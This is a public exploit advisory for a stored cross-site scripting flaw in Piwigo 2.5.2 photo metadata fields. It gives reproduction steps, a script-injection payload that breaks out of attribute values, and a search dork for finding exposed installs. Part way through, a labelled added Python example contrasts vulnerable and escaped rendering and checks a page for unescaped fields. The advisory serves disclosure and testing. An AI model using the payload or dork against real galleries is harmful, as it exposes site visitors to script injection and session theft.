Piwigo 2.5.2 - Cross-Site Scripting

EDB-ID: 28560
CVE: (none listed)
Author: Arsan
Type: webapps
Platform: PHP
Date: 2013-09-26


#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# Exploit Title: Piwigo <= 2.5.2 - Stored Cross-Site Scripting
# Date: 26 September 2013
# Author: Arsan
# Software Homepage: http://www.piwigo.org
# Version : 2.5.2
# Tested on: Linux & Windows
# Category: webapps
# Google Dork: intext:"Powered by Piwigo"
#
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# [+] Exploit :
#
# [-] About Piwigo :
#
# Host and share your photos with Piwigo
# Piwigo is photo gallery software for the web, built by an active community of users and developers.
# Extensions make Piwigo easily customizable. Icing on the cake, Piwigo is free and open source.
# Browse the demo (http://www.piwigo.org/demo) to discover Piwigo features on gallery side and change graphical theme on the fly.
#
# 	[-] Description :
#
#	    Stored XSS in the photo metadata fields. The payload is entered through the
#	    administration Batch Manager, so an account with admin rights is needed to
#	    plant it; once saved, it executes in the browser of every visitor who opens
#	    the photo page in the public gallery.
#
#	    1) Download Piwigo and install it.
#	    2) Create a new album ( Photos > Add > create a new album ):
#	       http://localhost/piwigo/admin.php?page=photos_add
#	    3) Upload a photo into the album and save it.
#	    4) Open the photo for editing via Photos > Batch Manager > single mode:
#	       http://localhost/piwigo/admin.php?page=batch_manager&mode=unit
#	    5) Put this payload in the "Title", "Author", "Tags" and "Description" fields and save:
#	       "><script>alert(/Arsan/)</script>
#	    6) Open the photo in the gallery:
#	       http://localhost/piwigo/picture.php?/[photo id]/category/[album id]
#	       The alert "Arsan" fires: the fields are rendered without HTML escaping, and the
#	       leading "> in the payload also breaks out of any attribute value they are echoed into.
#
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
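The following is an added example, not part of the original advisory and not Piwigo's code. It reproduces the attribute-breakout behaviour of the payload above against a hypothetical, deliberately simplified picture-page template (an assumption; Piwigo's real template is not shown here), shows the escaped rendering that closes the hole, and provides the check a tester would run on the real picture.php response after saving the payload in step 5.

```python
# Added example: not Piwigo's code and not part of the original advisory.
# It models the picture page with a simplified, hypothetical template so the
# attribute-breakout payload from the advisory can be run offline, shows the
# escaped rendering that closes the hole, and provides the check to apply to
# a real picture.php response after saving the payload.
import html
from html.parser import HTMLParser

# The exact payload from the advisory. The leading "> closes an attribute
# value and its tag, so the <script> element is injected even when the field
# is echoed inside alt="..." or title="..." rather than as element text.
PAYLOAD = '"><script>alert(/Arsan/)</script>'

# Hypothetical rendering template (assumption, not Piwigo's template): the
# title lands in two attributes and one element body, the other fields in
# element bodies, covering both contexts the payload targets.
TEMPLATE = (
    '<img src="/i/{id}.jpg" alt="{title}" title="{title}">\n'
    '<h2>{title}</h2>\n'
    '<p class="author">{author}</p>\n'
    '<p class="tags">{tags}</p>\n'
    '<p class="desc">{description}</p>\n'
)

# Constructed photo record with the payload saved in every field from step 5.
PHOTO = {
    "id": 1,
    "title": PAYLOAD,
    "author": PAYLOAD,
    "tags": PAYLOAD,
    "description": PAYLOAD,
}


def render_vulnerable(photo):
    """Echo the stored fields verbatim: the behaviour the advisory reports."""
    return TEMPLATE.format(**photo)


def render_hardened(photo):
    """Escape every field on output; quote=True also neutralises the leading
    double quote so attribute values cannot be terminated."""
    safe = {k: html.escape(str(v), quote=True) for k, v in photo.items()}
    return TEMPLATE.format(**safe)


class _ScriptCollector(HTMLParser):
    """Collect the body of every <script> element the browser would execute."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False


def injected_scripts(page_html):
    """Return the bodies of all <script> elements in the served page."""
    collector = _ScriptCollector()
    collector.feed(page_html)
    collector.close()
    return collector.scripts


def unescaped_fields(photo, page_html):
    """Names of fields whose raw, markup-bearing value appears verbatim in the
    page. Run this against the real picture.php response after step 5: every
    name returned is a field rendered without HTML escaping."""
    return sorted(
        name for name, value in photo.items()
        if isinstance(value, str) and "<" in value and value in page_html
    )


if __name__ == "__main__":
    for label, page in (("vulnerable", render_vulnerable(PHOTO)),
                        ("hardened", render_hardened(PHOTO))):
        print(f"{label}: {len(injected_scripts(page))} script element(s), "
              f"unescaped fields: {unescaped_fields(PHOTO, page)}")
```

With the payload in all four fields, the vulnerable rendering yields six executable script elements (the title is echoed three times, twice inside attributes) while the escaped rendering yields none. To check a live install, fetch the picture.php page after step 5 and pass its body to unescaped_fields with the values you saved.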
#
# [+] Demo :
#
# http://www.piwigo.org/demo
#
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# [+] Contact Me :
#
#     Arsan.Blackhat@gmail.com
#     Twitter.com/ArsanBlackhat
# 
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
# I L0ve Inj3ct0r Team
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#